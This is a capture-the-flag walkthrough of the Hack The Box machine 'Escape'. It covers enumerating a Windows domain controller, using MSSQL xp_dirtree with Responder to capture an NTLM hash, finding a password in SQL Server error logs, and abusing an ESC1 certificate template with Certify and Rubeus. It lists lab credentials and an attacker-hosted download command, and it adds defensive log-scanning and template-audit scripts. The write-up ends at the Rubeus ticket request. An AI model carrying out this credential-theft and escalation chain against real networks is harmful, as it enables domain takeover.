Medium Windows box that includes stealing an NTLM hash through MSSQL, passwords in log files and privilege escalation via a certificate template!
Credentials

Username       Password                           Description
-------------  ---------------------------------  ------------------------------------------------------
PublicUser     GuestUserCantWrite1                MS SQL password
sql_svc        REGGIE1234ronnie                   AD account responsible for running the database server
ryan.cooper    NuclearMosquito3                   Active Directory user found in SQL Server logs
Administrator  A52F78E4C751E5F5E17E1E9F3E58F4EE   NTLM hash
Enumeration
Nmap Scan
┌──(kali㉿kali)-[~/Documents/CTFs/HTB_Escape]
└─$ sudo nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49689,49690,49710,49714,59666 -A -T4 10.10.11.202 -oA nmap_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-04 13:23 EDT
Nmap scan report for 10.10.11.202
Host is up (0.038s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-06-05 01:23:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-06-05T01:24:35+00:00; +7h59m23s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-06-05T01:24:35+00:00; +7h59m23s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2023-06-05T01:24:35+00:00; +7h59m23s from scanner time.
| ms-sql-ntlm-info:
|   10.10.11.202:1433:
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-06-02T13:28:16
|_Not valid after:  2053-06-02T13:28:16
| ms-sql-info:
|   10.10.11.202:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-06-05T01:24:35+00:00; +7h59m23s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-06-05T01:24:35+00:00; +7h59m23s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49714/tcp open  msrpc         Microsoft Windows RPC
59666/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-06-05T01:23:57
|_  start_date: N/A
|_clock-skew: mean: 7h59m23s, deviation: 0s, median: 7h59m22s

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   39.26 ms 10.10.14.1
2   39.43 ms 10.10.11.202

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.96 seconds
SMB Shares
└─$ smbclient -L //10.10.11.202
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
There is one non-default share, Public. After connecting to it, there is a single PDF file.
└─$ smbclient \\\\10.10.11.202\\Public
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1394427 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (211.3 KiloBytes/sec) (average 211.3 KiloBytes/sec)
SQL Server Procedures.pdf
This PDF contains some information about connecting to the SQL database without an Active Directory account.
MS SQL
For the connection to the database I used the impacket-mssqlclient script.
└─$ impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
Databases
SQL> SELECT name FROM master.dbo.sysdatabases;
name
--------
master
tempdb
model
msdb
master, tempdb and msdb are default databases used by MSSQL, and the current user has no permission to access the model database.
SQL> use model;
[-] ERROR(DC\SQLMOCK): Line 1: The server principal "PublicUser" is not able to access the database "model" under the current security context.
SQL>
Permissions
SQL> use master;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
SQL> EXEC sp_helprotect 'xp_cmdshell';
[-] ERROR(DC\SQLMOCK): Line 291: There are no matching rows on which to report.
SQL> EXEC sp_helprotect 'xp_dirtree';
Owner Object Grantee Grantor ProtectType Action Column
------ -------------------- ------------ ------- ----------- -------------- ------
sys xp_dirtree public dbo b'Grant ' Execute .
SQL> EXEC sp_helprotect 'xp_subdirs';
[-] ERROR(DC\SQLMOCK): Line 291: There are no matching rows on which to report.
SQL> EXEC sp_helprotect 'xp_fileexist';
Owner Object Grantee Grantor ProtectType Action Column
------ ------------------------ ------------ ------- ----------- -------------- ------
sys xp_fileexist public dbo b'Grant ' Execute .
The current user can't execute xp_cmdshell, which would allow running shell commands on the database server directly through the database.
But there is an execute permission on xp_dirtree, and this can be used to steal the NTLM hash of the user that is running the database server.
This should also be possible with xp_fileexist, but I had no luck with that function.
Stealing NTLM hash
Setting up Responder
Responder is a tool that speaks most of the common network protocols; it is focused on stealing hashes and credentials.
┌──(kali㉿kali)-[~/Documents/CTFs/HTB_Escape]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.109]
Responder IPv6 [dead:beef:2::106b]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-NCM14VQ3QD4]
Responder Domain Name [KHXV.LOCAL]
Responder DCE-RPC Port [47910]
[+] Listening for events...
So the password for the sql_svc account is REGGIE1234ronnie.
Foothold
The acquired credentials have permission to connect via remote access.
Enumeration
I ran winPEAS but there is nothing special in there, so the next step was manual enumeration.
As there was nothing in the home directory of the sql_svc user, and SQLServer is the only non-default directory (because the MS SQL server is running there), I started looking around. The only semi-interesting file is ERRORLOG.BAK, located at C:\SQLServer\Logs.
In there is a password for the user ryan.cooper.
The log states: Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
The next entry is: Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
NuclearMosquito3 looks like a password, so this is probably a typo on the user's side and he typed the password in the username field.
This was indeed the password for the ryan.cooper user, and this allowed logging in to his account.
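The same pattern can be caught on the defending side: a failed logon whose "username" is not a known principal but looks like a credential, shortly after a real username failed from the same client, is a password leaking into the ERRORLOG. The script below is an added example written for this writeup, not a tool from the box or from the author; the ERRORLOG excerpt is constructed around the two entries quoted above (timestamps, the 18456 error lines and the third entry are assumptions), and KNOWN_USERS is a constructed list of the accounts seen in this writeup.

```python
import re
from datetime import datetime

# Constructed ERRORLOG excerpt: the two "Logon failed" entries quoted in the writeup
# plus the "Error: 18456" lines a real ERRORLOG carries before each of them.
# Timestamps, the State values and the third (sql_svc) entry are assumptions.
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:08.95 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:08.95 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:45:30.10 Logon       Logon failed for user 'sequel.htb\\sql_svc'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.109]
"""

# Principals the monitoring side knows about (constructed from the accounts in this writeup).
KNOWN_USERS = {"sequel.htb\\ryan.cooper", "sequel.htb\\sql_svc", "publicuser"}

# One ERRORLOG "Logon failed" line: timestamp, source column, message, client address.
LOGON_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\. Reason: (?P<reason>.*?) "
    r"\[CLIENT: (?P<client>[^\]]+)\]$"
)


def parse_failed_logons(text):
    """Extract every 'Logon failed for user' entry as a dict (ts, user, reason, client)."""
    events = []
    for line in text.splitlines():
        m = LOGON_FAILED.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append(ev)
    return events


def looks_like_password(name, known_users):
    """Heuristic for a credential typed into the username field: not a known
    principal, no DOMAIN\\ or @ qualifier, and mixed case plus at least one digit."""
    if name.lower() in known_users or "\\" in name or "@" in name:
        return False
    return (any(c.isupper() for c in name) and any(c.islower() for c in name)
            and any(c.isdigit() for c in name))


def find_leaked_credentials(text, known_users, window_seconds=60):
    """Pair each password-looking failed logon with the most recent real username
    that failed from the same client within window_seconds.
    Returns (likely_username, leaked_value, client) tuples."""
    last_real = {}  # client address -> (timestamp, username of last genuine failure)
    findings = []
    for ev in parse_failed_logons(text):
        if looks_like_password(ev["user"], known_users):
            prev = last_real.get(ev["client"])
            if prev and (ev["ts"] - prev[0]).total_seconds() <= window_seconds:
                findings.append((prev[1], ev["user"], ev["client"]))
        else:
            last_real[ev["client"]] = (ev["ts"], ev["user"])
    return findings


if __name__ == "__main__":
    for user, value, client in find_leaked_credentials(SAMPLE_ERRORLOG, KNOWN_USERS):
        masked = value[:2] + "*" * (len(value) - 2)   # never echo the full secret into another log
        print(f"probable password of {user} recorded in ERRORLOG (sent as login name from {client}): {masked}")
```

Real ERRORLOG files are usually UTF-16 encoded, so open them with encoding="utf-16" before passing the text in. A hit means the account's password should be rotated and the log (including rotated copies such as ERRORLOG.BAK) treated as sensitive; on this box the log directory was readable by the low-privileged service account, which is what turned a typo into a lateral move.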
Privilege Escalation
I ran winPEAS again but no luck there. Additionally I gathered information about the domain with SharpHound to analyze permissions and connections in BloodHound, but again no luck.
But there is a trend in Windows environments to switch to certificate-based authentication. There are many things that can go wrong, e.g. a certificate template with too wide permissions.
For a certificate template to be vulnerable, some specific flags need to be set:
msPKI-Certificate-Name-Flag set to ENROLLEE_SUPPLIES_SUBJECT: this means the user requesting the certificate can specify the subject, effectively the user that will be authenticated.
Access rights need to allow Enroll for NT AUTHORITY\Authenticated Users: this means any logged-in user can request a certificate.
pkiextendedkeyusage needs to include Client Authentication, which allows impersonating another user.
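The three conditions above can be checked mechanically against the template attributes stored in the Configuration naming context. The audit helper below is an added example for this writeup, not code from the box, from Certify or from the author; the template records are constructed stand-ins for LDAP results (names and the domain SID prefix are made up), and the example goes slightly beyond the text by also checking the two settings that break the chain even when the three flags are present: CA manager approval (msPKI-Enrollment-Flag bit PEND_ALL_REQUESTS) and required authorized signatures (msPKI-RA-Signature).

```python
# Constants from the certificate-template schema (MS-CRTD), not from the writeup.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000    # CA builds the SAN from the requester's UPN
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # bit in msPKI-Enrollment-Flag: manager approval

# EKU OIDs that let the issued certificate be used for domain logon. The writeup only
# names Client Authentication; the other three are the usual additions in an ESC1 audit.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "2.5.29.37.0": "Any Purpose",
}

# Well-known principals whose Enroll right amounts to "any domain account".
BROAD_SIDS = {"S-1-1-0": "Everyone", "S-1-5-11": "NT AUTHORITY\\Authenticated Users"}
BROAD_RIDS = {"513": "Domain Users", "515": "Domain Computers"}


def principal_is_broad(sid):
    """Return a display name if the SID is a broad group, otherwise None."""
    if sid in BROAD_SIDS:
        return BROAD_SIDS[sid]
    if sid.startswith("S-1-5-21-"):
        return BROAD_RIDS.get(sid.rsplit("-", 1)[-1])
    return None


def esc1_conditions(template):
    """Evaluate each ESC1 precondition for one template; the template is
    exploitable only when every value is True."""
    # LDAP returns these flags as signed 32-bit ints; mask so negative values decode correctly.
    name_flag = template.get("msPKI-Certificate-Name-Flag", 0) & 0xFFFFFFFF
    enroll_flag = template.get("msPKI-Enrollment-Flag", 0) & 0xFFFFFFFF
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    broad = [p for p in map(principal_is_broad, template.get("enroll_sids", [])) if p]
    return {
        "enrollee_supplies_subject": bool(name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "authentication_eku": bool(ekus.intersection(AUTH_EKUS)),
        "broad_enroll_rights": bool(broad),
        "no_manager_approval": not (enroll_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": template.get("msPKI-RA-Signature", 0) == 0,
    }


def is_esc1(template):
    return all(esc1_conditions(template).values())


def audit(templates):
    """Names of the templates that satisfy every ESC1 precondition."""
    return [t["name"] for t in templates if is_esc1(t)]


# Constructed templates standing in for entries under CN=Certificate Templates,
# CN=Public Key Services,CN=Services,CN=Configuration,... ; the domain SID is a placeholder.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
TEMPLATES = [
    {"name": "ExampleUserAuth",            # all three flags from the writeup, nothing stopping it
     "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll_sids": [DOMAIN_SID + "-513", "S-1-5-11"]},
    {"name": "ExampleHardened",            # CA supplies the subject from the requester's UPN
     "msPKI-Certificate-Name-Flag": CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,
     "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll_sids": [DOMAIN_SID + "-513"]},
    {"name": "ExampleManagerApproved",     # enrollee supplies subject, but a CA manager must approve
     "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll_sids": ["S-1-5-11"]},
]

if __name__ == "__main__":
    for t in TEMPLATES:
        print(t["name"], "ESC1" if is_esc1(t) else "ok", esc1_conditions(t))
```

The fix for a template that comes back as ESC1 is whichever of the failed conditions is cheapest to change: clear ENROLLEE_SUPPLIES_SUBJECT so the CA derives the subject from the requester, require manager approval, or cut the Enroll right down to the specific accounts that need the template. Feed the function with real attributes from an LDAP search over the Configuration partition and the enrollment ACEs from the template's security descriptor.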
After converting the certificate from PEM to the right format with openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx, as suggested in the Certify output, it needs to be transferred back to the Windows box.
I did it by setting up a Python web server with python -m http.server and downloading it on the Windows box with IWR http://10.10.14.109:8000/cert.pfx -Outfile cert.pfx
With the certificate on disk, next we need Rubeus to interact with Kerberos and request a ticket for the Administrator account using the generated certificate.
The asktgt mode is responsible for requesting TGT tickets